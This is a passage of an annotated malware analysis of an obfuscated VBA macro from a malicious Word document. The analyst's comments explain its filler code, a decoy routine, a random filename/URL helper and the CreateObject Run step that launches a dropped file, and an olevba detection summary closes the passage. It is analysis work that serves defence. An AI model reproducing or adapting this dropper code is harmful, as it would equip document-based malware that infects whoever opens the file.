  473. O5V6ScwVCAZ = 27
  474. If O5V6ScwVCAZ + PXxhQZeju > 1 Then
  475. PXxhQZeju = 15 + 50
  476. '45 IngzthtttId 88 57
  477. End If
  478. PXxhQZeju = 77
  479. '89 81 4 KHzH6kuqC0TL80
       ' Late-bound object from a decoded 13-character ProgID; its Run method is given the drop
       ' path wrapped in double quotes. This is the execution step (olevba's Run hit).
  480. CreateObject(N850BCurHo(Chr$(251) + Chr$(229) + Chr$(196) + Chr$(204) + Chr$(220) + Chr$(252) + Chr$(32) + Chr$(88) + Chr$(26) + Chr$(39) + Chr$(28) + Chr$(45) + Chr$(33), "HFEg5mRqAFsJAXISn")).Run """" & G5UczWAvCd8 & """"
  481. RDyJ7Y = 52
  482. If RDyJ7Y + HukbQ > 1 Then
  483. HukbQ = 93 + 41
  484. '26 EM6EP9G1 19 41
  485. End If
  486. HukbQ = 73
  487. '2 43 20 HErA9V4SK2W
  488. Set Jy6OeQYzbkLfj4 = Nothing
  489. End Sub
  490. Sub PGYDqcNIiY()
       ' Decoy routine, called from Document_Open's two Else branches (the paths taken when the
       ' environment check fails). It invokes assorted VBA built-ins with constant arguments and
       ' never uses the results; nothing here decodes strings, makes requests or writes files.
       ' The AppActivate entry in the olevba summary comes from this routine only.
       ' Several calls look invalid with these arguments, and the Sub has no error handler of
       ' its own, so presumably the first run-time error hands control back to the caller's
       ' On Error Resume Next -- confirm in a debugger.
  491. FSytexzdRD = 9
  492. If FSytexzdRD + BIds252 > 1 Then
  493. BIds252 = 24 + 4
  494. '64 M9kCIWJkz39tjuedSsx 55 56
  495. End If
  496. BIds252 = 53
  497. '63 34 21 WJkz39tjuedS
  498. TimeValue 77
  499. OZymfbItYx = UCase(6)
  500. YIMdX5LppqEnQYKt = QBColor(20)
  501. SHIpR8r0U6XL = CurDir
  502. Hour 23
  503. IN1K98kRLjtt6n3hA = Dir("VVdgLL8J8GsT50BFu")
  504. If CByte(41) = True Then FOtBdLFOEImukpB = 8676
  505. NPer 33, 37, 12
  506. Rate 48, 64, 44
  507. Command
  508. Month 5
  509. Rnd
  510. AppActivate 95
       ' BgtwAmm is not defined anywhere in this listing.
  511. Load BgtwAmm
  512. Tan 96
  513. Err.Raise 93
  514. Sqr 3
  515. If CDbl(74) = True Then Hy485SM = 87
  516. DDB 2, 33, 84, 83
  517. Year 14
  518. DateAdd "IE7XitPAb4xP", 94, 83
  519. Weekday 32
  520. JjNFS = Day(87)
  521. Loc 47
  522. IGe6BI0fWwS = Cos(10)
  523. ChDir 43
  524. Second 8
  525. IMVlVpey78hH6 = CVDate(85)
  526. ChDrive 26
  527. Err.Clear
  528. G04GvszyHcz7cUz = 59
  529. If G04GvszyHcz7cUz + EG1gFhqZ > 1 Then
  530. EG1gFhqZ = 57 + 88
  531. '95 RvBGuX 1 85
  532. End If
  533. EG1gFhqZ = 33
  534. '62 48 18 GpCqyVrr
  535. End Sub
  536. Function NQfyvvczlB() As String
       ' Returns a random whole number as a String. The value is Int(9999 * Rnd), redrawn until
       ' it is at least 99, so results fall in 99..9998.
       ' Used for the dropped file's name component (via GpkKWN3) and appended to each request
       ' URL in Yo0cZy9rsLWc833; every call draws a new value.
       ' The "X = n / If X + Y > 1 Then ... End If / Y = m" groups and numeric comments are filler.
  537. YJIxHpJTHPyKYz = 94
  538. If YJIxHpJTHPyKYz + CAwmLM > 1 Then
  539. CAwmLM = 25 + 32
  540. '38 KEALS7PCSeJF8XbJ 22 69
  541. End If
  542. CAwmLM = 26
  543. '84 54 46 XCUmU
  544. Dim KHK50vUSWRXp As Long
  545. Rvwe6AD2e2R2 = 81
  546. If Rvwe6AD2e2R2 + Q8eCMd1 > 1 Then
  547. Q8eCMd1 = 6 + 5
  548. '36 J1m983Xb0Ro 43 48
  549. End If
  550. Q8eCMd1 = 32
  551. '80 9 94 PxfC3IiEmZ
       ' Retry label: execution returns here while the drawn value is below 99.
  552. KBTQl75TBRxS:
  553. Hz9biQhNoy = 22
  554. If Hz9biQhNoy + UE8BFCtLq3pdRI > 1 Then
  555. UE8BFCtLq3pdRI = 84 + 96
  556. '33 QhNoy 49 29
  557. End If
  558. UE8BFCtLq3pdRI = 89
  559. '80 81 78 IHPSHJLrgQCWdpaQ0
       ' Re-seeds the generator on every attempt.
  560. Randomize
  561. MAvFduSXDsQzeGbCs = 62
  562. If MAvFduSXDsQzeGbCs + Rf9cavtzvtaGn8 > 1 Then
  563. Rf9cavtzvtaGn8 = 8 + 97
  564. '55 VB4TDZNH6xVvAx 58 21
  565. End If
  566. Rf9cavtzvtaGn8 = 59
  567. '70 85 65 PhrAJP4Z5
       ' (4999.5 + 5 + 4999.5 - 5) = 9999.
  568. KHK50vUSWRXp = Int((4999.5 + 5 + 4999.5 - 5) * Rnd)
  569. EW1hJ0wrkq9c = 44
  570. If EW1hJ0wrkq9c + J9KlHAPO6Be > 1 Then
  571. J9KlHAPO6Be = 78 + 73
  572. '17 O9YtO 59 7
  573. End If
  574. J9KlHAPO6Be = 18
  575. '10 33 39 Q7pMOMRcYyZHZd
       ' (49.5 + 6 + 49.5 - 6) = 99: values below 99 are rejected and redrawn.
  576. If KHK50vUSWRXp < (49.5 + 6 + 49.5 - 6) Then GoTo KBTQl75TBRxS
  577. N7hDrZw3PV = 12
  578. If N7hDrZw3PV + L14gSB4TDZNH > 1 Then
  579. L14gSB4TDZNH = 2 + 58
  580. '62 A6xVvAxgzJqDs 25 37
  581. End If
  582. L14gSB4TDZNH = 73
  583. '89 69 30 HaAooKzRxBoNXCkkC
       ' The Long is coerced to String by the function's declared return type.
  584. NQfyvvczlB = KHK50vUSWRXp
  585. V0CqzFv63ukddr = 61
  586. If V0CqzFv63ukddr + Ca1OA > 1 Then
  587. Ca1OA = 37 + 26
  588. '6 Pfmhh9O5qs4y 66 83
  589. End If
  590. Ca1OA = 84
  591. '81 91 62 KL8QYMjG9cmlo
  592. End Function
  593.  
  594. +------------+----------------------+-----------------------------------------+
  595. | Type       | Keyword              | Description                             |
  596. +------------+----------------------+-----------------------------------------+
  597. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  598. | Suspicious | Open                 | May open a file                         |
  599. | Suspicious | Run                  | May run an executable file or a system  |
  600. |            |                      | command                                 |
  601. | Suspicious | CreateObject         | May create an OLE object                |
  602. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  603. |            |                      | strings                                 |
  604. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  605. |            |                      | strings                                 |
  606. | Suspicious | CreateTextFile       | May create a text file                  |
  607. | Suspicious | Environ              | May read system environment variables   |
  608. | Suspicious | Write                | May write to a file (if combined with   |
  609. |            |                      | Open)                                   |
  610. | Suspicious | AppActivate          | May control another application by      |
  611. |            |                      | simulating user keystrokes              |
  612. | Suspicious | Lib                  | May run code from a DLL                 |
  613. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  614. |            |                      | be used to obfuscate strings (option    |
  615. |            |                      | --decode to see all)                    |
  616. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  617. |            |                      | may be used to obfuscate strings        |
  618. |            |                      | (option --decode to see all)            |
  619. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  620. |            | Strings              | may be used to obfuscate strings        |
  621. |            |                      | (option --decode to see all)            |
  622. +------------+----------------------+-----------------------------------------+